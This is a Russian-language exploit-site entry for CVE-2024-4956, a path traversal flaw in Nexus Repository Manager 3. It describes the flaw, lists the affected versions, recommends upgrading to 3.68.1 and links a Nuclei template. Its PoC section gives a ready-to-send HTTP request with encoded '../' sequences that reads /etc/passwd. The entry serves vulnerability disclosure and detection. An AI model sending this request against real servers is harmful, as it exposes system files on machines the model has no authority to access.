## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ERICKFERNANDOX-CVE-2024-4956
# CVE-2024-4956 - Неавторизованный обход пути в Nexus Repository Manager 3
Nexus Repository Manager — это менеджер репозиториев, который организует, хранит и распространяет артефакты, необходимые для разработки.
Уязвимость обхода пути была обнаружена в Nexus Repository 3, в версиях до 3.68.1. Эта уязвимость позволяет злоумышленнику создать URL-адрес для загрузки системных файлов за пределами области приложения Nexus Repository без какой-либо аутентификации. Это представляет значительный риск, так как может раскрыть конфиденциальные системные файлы и потенциально поставить под угрозу безопасность среды, где установлен Nexus Repository.
Рекомендуется как можно скорее обновить Nexus Repository до версии 3.68.1 или новее, чтобы устранить эту уязвимость.
Для получения дополнительной информации и технических деталей об уязвимости обратитесь к следующей ссылке:
Ссылки:
* https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16
## Уязвимые версии
Уязвимость затрагивает версии с 3.0 по 3.68.0 Sonatype Nexus Repository Manager.
### Устранение:
Обновление Nexus Repository является рекомендуемым подходом для устранения этой уязвимости. Однако для развертываний, которые не могут быть сразу обновлены, доступны варианты немедленного смягчения:
Ссылки:
* https://support.sonatype.com/hc/en-us/articles/29412417068819
## PoC
root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
С помощью приведенного выше PoC можно увидеть, как происходит доступ к файлу /etc/passwd:

## Шаблон Nuclei
(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml